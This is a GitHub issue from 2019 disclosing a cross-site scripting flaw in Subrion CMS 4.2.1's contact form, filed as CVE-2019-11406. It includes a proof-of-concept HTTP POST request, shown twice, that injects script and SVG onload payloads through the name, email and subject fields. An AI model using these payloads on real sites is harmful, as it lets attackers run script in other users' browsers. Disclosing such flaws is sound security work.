Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Subrion CMS 4.2.1 allows _core/en/contacts/ XSS via the name, email, or phone parameter #821

Closed
alorfm opened this issue Apr 21, 2019 · 1 comment

Comments

Projects
None yet
2 participants
@alorfm
Copy link

commented Apr 21, 2019

Title: [Subrion CMS- 4.2.1 XSS]

Date: [12-04-2019]

[Vulnerability Type]

Cross Site Scripting (XSS)

Version: [4.2.1]

Tested on:

[Windows,FireFox]

[Affected Product Code Base]

Subrion CMS - 4.2.1

[Affected Component]

parameter: name.
parameter: email.
parameter: phone.
In contact page

PoC:

POST /_core/en/contacts/ HTTP/1.1
Host: demos.subrion.org
Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2
Upgrade-Insecure-Requests: 1
__st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=



[Impact Code execution]
true


[Attack Vectors]
POST /_core/en/contacts/ HTTP/1.1
Host: demos.subrion.org
Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2

__st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=


Author: [Mohammed Alorf - twitter:@_oww]

CVE-2019-11406.

@alorfm

This comment has been minimized.

Copy link
Author

commented Apr 23, 2019

can anyone please review this bug? this is a quite critical vulnerability.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.